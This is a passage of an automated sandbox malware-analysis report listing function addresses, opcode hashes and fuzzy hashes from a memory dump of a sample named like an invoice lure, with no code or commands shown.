                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 438f1f14301915180acce1c0c6d51af1f91a51cde1f72783656591f3769f4197
                                            • Instruction ID: 5eb17a0c30cc04f012afef6876da5920ac819c1564260a4906468a1757abb0e4
                                            • Opcode Fuzzy Hash: 438f1f14301915180acce1c0c6d51af1f91a51cde1f72783656591f3769f4197
                                            • Instruction Fuzzy Hash: 7F31C472E10219AFDB21EFA9CC44BAFBBF9EF04750F514465E596D7250D2709E008BA0
                                            Function 011460B8 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                            • Instruction ID: 8e1bfe04ed1d8603b55aa8f051c4e64413d3b239f3778b0f8f6af2b057adc410
                                            • Opcode Fuzzy Hash: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                            • Instruction Fuzzy Hash: E631E871640616AFDB1E9F59C850BAEB7B5AF85F58F014069E505DB341DB30DC00CB90
                                            Function 010807AF Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84b68291dc26acaadef8e1764c3cfb5b46ac29f74504b417275eb1a00506a1a4
                                            • Instruction ID: dbb1a41998e7d5ec8242c80daf886a4daf15c4296922314e13bc79e853ffb116
                                            • Opcode Fuzzy Hash: 84b68291dc26acaadef8e1764c3cfb5b46ac29f74504b417275eb1a00506a1a4
                                            • Instruction Fuzzy Hash: 1F31D132A18716DBC712FE28C880AAFBBE5AF94250F014569FDD59B314DB30DC4987E1
                                            Function 01088550 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
                                            • Instruction ID: d41d98600419774b7bf4d19debf573870a4855213bbc4900becd6eb409046358
                                            • Opcode Fuzzy Hash: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
                                            • Instruction Fuzzy Hash: 023190716093118FE3A4DF19C844B1ABBE9FF98710F4449AEF9C497292D770E844CBA1
                                            Function 010BA6C7 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction ID: a8226140fa0247dbd6b1e029d2cc7f9b27a7e95674f9e4983f979c1c0f3a6a46
                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                            • Instruction Fuzzy Hash: C7312CB2B04B01EFD765CF69CD81B97BBF8BB08A50F04456DA59AC3650E630E9008B64
                                            Function 0112EBD0 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73ece8232954776279bf2c950b91c134e4a84a611276455a41645c2683195144
                                            • Instruction ID: 077444bc2355851e6ffd1d988a42ce1ef9780d8545303477266447a2632c532b
                                            • Opcode Fuzzy Hash: 73ece8232954776279bf2c950b91c134e4a84a611276455a41645c2683195144
                                            • Instruction Fuzzy Hash: F731BAB150A3519FCB19DF5AC54095ABBF1FF89214F0449AEE4889B311D330DA65CF92
                                            Function 010A438F Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                            • Instruction ID: 995dd74cf919e5fede9b39f6a3c8987365807f804f13c67c2d08df5bf92c4db5
                                            • Opcode Fuzzy Hash: 3f0acaec56d7137ec67406ccda891d67fc15dfdb9649c55a8357541b138c1606
                                            • Instruction Fuzzy Hash: A431E236B006059FD724EFF9C980AAEBBFAAB84304F548429D195D7254DB70D941CB90
                                            Function 0107CB7E Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction ID: eb0c3beb006a1d94be593c853a0bc7cd32e3cffc0e0b21634df2a8263bfdb11e
                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                            • Instruction Fuzzy Hash: EB21F536E0025BAADB109BB98810BEFBBB6AF14750F058075AA95E7240E770D90087A4
                                            Function 0107C156 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                            • Instruction ID: c25a8998828bd6eb9d4dc7fe82b8c30e1a2b98ea95318902cae563b8d515dade
                                            • Opcode Fuzzy Hash: 374845dead82de9cd0d72c341b138c783a380590d9ec9973d9fbdfa6292adbd0
                                            • Instruction Fuzzy Hash: 6B3125B15003119BDB65AF68CC40BA97BB4BF54314F9481E9E9C99B382EA34D982CB90
                                            Function 0113C3CD Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction ID: 1187b49ac223664e0d07cec27333c941efb36327696cbb45075e45131e26d50f
                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction Fuzzy Hash: 6C212B36600656A6CB19ABA5D800BFABBB4EFC0714F40801BFAD59B691E734D940C7E0
                                            Function 0107E420 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                            • Instruction ID: 19e6cf070d451f19ffab3e2e2a89e35c628ccb1618179d9e6be2277bdfdb57bf
                                            • Opcode Fuzzy Hash: 18e4d1d0017bafdd206c6a9c6acecace49b4766f779305f92b6be656ea263513
                                            • Instruction Fuzzy Hash: 2B31B431E0252C9BDB35DF18CC41FEE77B9AB15740F0101E5E6D5AB290DA74AE808FA4
                                            Function 010B4588 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction ID: 5eef5bc2f57ecd7ed9d23eae8ded3c999962229f2a5fea3eda646aeb7c8d8cb7
                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction Fuzzy Hash: 73216D32A00609EBCB15CF58C9C0ADEBBA5FF58714F10806AEE56DB242D671EA058B91
                                            Function 010B44B0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                            • Instruction ID: cd12919d312f68e38f752fe69679fce78f6df42e2fbe6b19b1bcf67bd67f92a4
                                            • Opcode Fuzzy Hash: da6267ed2102b7d799a2cebaca5f10a38a581ec38df9659f5ae87a303ea9520a
                                            • Instruction Fuzzy Hash: D0219372604B459BCB21DF58C880BAB77E4FB88760F014559FD959B642D730EE41CBA2
                                            Function 0107E388 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction ID: d4f17dba35d284c4a093e39ff0f4bd1597589bad0ebd936e8e9b56ba0d7b39d1
                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction Fuzzy Hash: 9D319C31A01605EFD721CFA8C884F6AB7F9EF85354F1045A9E5928B280E730EE02CB50
                                            Function 010FE609 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0fa0f1c97f7109f4695544ebd89b04c6d301e25ff2b993e92de7978f08c5a298
                                            • Instruction ID: 2f80e6d1d012851a57f2538822c1989637711bada25797ec943fcc4f0ff6f398
                                            • Opcode Fuzzy Hash: 0fa0f1c97f7109f4695544ebd89b04c6d301e25ff2b993e92de7978f08c5a298
                                            • Instruction Fuzzy Hash: B8319E7960020A9FDB18CF1CC8859AEB7F5EF88344B16445DE9899B7A1E730EA40CB94
                                            Function 011006F1 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f91b5847e80fa3c38109a09b9a2d2dc947fea376a8e2e6a975ed957cde7843c
                                            • Instruction ID: 1bfd8f16e433378dcc2187de12161084d78283f3c6a7d8a89c7485706604543d
                                            • Opcode Fuzzy Hash: 5f91b5847e80fa3c38109a09b9a2d2dc947fea376a8e2e6a975ed957cde7843c
                                            • Instruction Fuzzy Hash: 4E219E719005299BCF159F59C881ABEB7F4FF48740B40406AF581EB250D778AD41CBA1
                                            Function 0110019F Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                            • Instruction ID: a017ac0553a06da4845c5a74f83cd59ff4b018f316c64adf0be9259e19dbf783
                                            • Opcode Fuzzy Hash: af43fd925b78e620417d1c83ba28b54403d23a136d2b815c8cb2f9695d617a22
                                            • Instruction Fuzzy Hash: 4821AB71A00645ABDB1ADB68D850FAAB7A8FF48780F14006AF944DB690D774ED40CBA8
                                            Function 01100283 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0bb85cbee00cbc350a42591473d768baa41a875e4257a88de5e2d967ebff167
                                            • Instruction ID: f29009d6821a7e61d15bb25483a0a3d73a89aa241f942d70ec88780fa049078a
                                            • Opcode Fuzzy Hash: d0bb85cbee00cbc350a42591473d768baa41a875e4257a88de5e2d967ebff167
                                            • Instruction Fuzzy Hash: C621D671D083459FD717EF69C844B9BBBDCAF94280F080456BD90CB291D7B0D504C7A2
                                            Function 010A2835 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52756926bb867139be6e719aee74352286a489357735988bbc2eef985c362d9e
                                            • Instruction ID: 81ff07aaefc4a09610e16dd5abe6adb649736b61f31bd593e61753ff87a96cbf
                                            • Opcode Fuzzy Hash: 52756926bb867139be6e719aee74352286a489357735988bbc2eef985c362d9e
                                            • Instruction Fuzzy Hash: 8121073170A682DBE722676C8C18B297BD4AF45774F2903B0FAF19B6D2D769C8018640
                                            Function 010BA30B Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f8d2ef757cdaf2b2f1ab9baf6610547472b0eb831696d036c41fbefc846859c
                                            • Instruction ID: 2ac0f15ce2bd427ab416557c25bed399cb798eb73d254dd96d977c017ce4b995
                                            • Opcode Fuzzy Hash: 1f8d2ef757cdaf2b2f1ab9baf6610547472b0eb831696d036c41fbefc846859c
                                            • Instruction Fuzzy Hash: 82219A75201B41DBCB29DF29C941B86B7F5AF48B04F14846CA589DBB61E331E842CF94
                                            Function 0113A49A Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df7334f64a8ff8589aad1715dac1d8d12b289b250ea4322cbcb7d33241d6b548
                                            • Instruction ID: 81daeb0b577741040c1a53311f989a7ca4976df94febadbe3cc59bb6959d97df
                                            • Opcode Fuzzy Hash: df7334f64a8ff8589aad1715dac1d8d12b289b250ea4322cbcb7d33241d6b548
                                            • Instruction Fuzzy Hash: 51112972380B11BFE72A6659AC01F6B7699DFD4B60F154128BBC8CB2C8EB70DC018795
                                            Function 01100946 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70cce3e3000b414c92c98273ee0e5a30902ff926de8c6e6dd146615e6589f3a1
                                            • Instruction ID: 8cce2b33d1137bf2b79bb322c7a71f477b1f2aa1eb43da6e121289e44cdb48f7
                                            • Opcode Fuzzy Hash: 70cce3e3000b414c92c98273ee0e5a30902ff926de8c6e6dd146615e6589f3a1
                                            • Instruction Fuzzy Hash: A521E9B1E00209ABDB24DFAAD980AAEFBF9FF98710F10012EE415A7350D7B09941CF54
                                            Function 011180A8 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction ID: d4348fb4f38982b95ac777abc0333d6d63c4e8eddc30989eb90b8fea56b0dcbd
                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction Fuzzy Hash: 20218C72A00209EFDF169F98CC40BAEBBB9EF88310F218429F944A7251D734DD50DB50
                                            Function 010B0124 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction ID: d84ef3e60e4f38ee77a5516afbc77bc47c8a5f9b5bb05fca589d3158dce595b3
                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction Fuzzy Hash: 2711EF72640605AFEB269F48CC80FDBBBB8EB80754F100429F6809F180D671EE44CB60
                                            Function 01088770 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff89d4fe68d9a5bb035e95e3bc80054407a5ffe68daabef0b93dcf1758c5e42e
                                            • Instruction ID: 62b39c5523b9e915bcb9887a6609d023784650305e9a5849f32fa9b4f06272fb
                                            • Opcode Fuzzy Hash: ff89d4fe68d9a5bb035e95e3bc80054407a5ffe68daabef0b93dcf1758c5e42e
                                            • Instruction Fuzzy Hash: 0911B631704611DBEB55EF4DC480A5ABBF5BF46B10B94C0EEEE889F205D6B1D901C790
                                            Function 010880E9 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cab77846db07bdecf8e51e1c340d035a9e4287a7f55f8e02317b8d0148c6289b
                                            • Instruction ID: d274a55c63a2a14b55fab09d8fb5ec783e4c780ab4987ad8c417290c4badcdbb
                                            • Opcode Fuzzy Hash: cab77846db07bdecf8e51e1c340d035a9e4287a7f55f8e02317b8d0148c6289b
                                            • Instruction Fuzzy Hash: 7F215E75A04205DFCB14DF58C591AAEBBF9FB88314F6481AED185A7311CB71AD06CB90
                                            Function 010B674D Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbec88e8e65dc84c761330a67755f4f18116cede98393de7f38bfc4e12d7641e
                                            • Instruction ID: 98886b815907e545bf8ea2149f41dcf5e2d7ccc66d8158f0aa3beb2a41dd6cb5
                                            • Opcode Fuzzy Hash: fbec88e8e65dc84c761330a67755f4f18116cede98393de7f38bfc4e12d7641e
                                            • Instruction Fuzzy Hash: F9219D71600A01EFD7648FA9C881FAAB7F8FF44350F44882DE5EAC7650DB31A840CB60
                                            Function 01116870 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99df100a83a289288119ed9193583a8c471de6280c04e71c196dd22508e2998f
                                            • Instruction ID: d8e96b6a2f1b185c1d24276a417f6b3bc8e290e985d31d527e3f4a16d40e6440
                                            • Opcode Fuzzy Hash: 99df100a83a289288119ed9193583a8c471de6280c04e71c196dd22508e2998f
                                            • Instruction Fuzzy Hash: 3811C132240618EFC72ACB5DCD40F9AB7A9EB59750F014035F645DB264EBB2E801CB90
                                            Function 010AE8C0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8c34f03cf94185c999eb3e4fe924b959a910bc71a3dd39e39d9d53b6595e12d
                                            • Instruction ID: 5dc469aebcf17833ee24b50337048c84fd8ded632a5c811966d597d28106da38
                                            • Opcode Fuzzy Hash: f8c34f03cf94185c999eb3e4fe924b959a910bc71a3dd39e39d9d53b6595e12d
                                            • Instruction Fuzzy Hash: D11148333045159FCF19DB29CD95A6FB2A7EBD52B0B248568D963CB380EA308802C390
                                            Function 010B66B0 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 281fd1dbb15aa75c3b4c2d0f68cae4b65e7c0591fabdad765cccb4bb1732bac4
                                            • Instruction ID: dfc25def521633706a51e25c139345256bd4de20697ec3a53f1bed13eb4e8bb9
                                            • Opcode Fuzzy Hash: 281fd1dbb15aa75c3b4c2d0f68cae4b65e7c0591fabdad765cccb4bb1732bac4
                                            • Instruction Fuzzy Hash: 1C11E076A42645EFCB29CF5AC5D0E9ABBF8FF94650B0140BAD985DB311E630DD00CB90
                                            Function 0114A8E4 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction ID: 518a5cd15e5097a1cf8fe5d3233187b5599965b4064666e686fcb9e878a107bf
                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction Fuzzy Hash: B3110436A00919AFDB1DCB58C811B9EBBB5EF84614F058269E85697340E731AD11CB90
                                            Function 0110E7E1 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction ID: e1fb7b3dbae417b6990fcf945d98c4aa017b421176dce19c10b27dad35b90114
                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                            • Instruction Fuzzy Hash: F111C632E02601EFEB2AAF4AC840B567BE5FF45754F05882AE9499B190D7B1DE40DB90
                                            Function 010A27ED Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
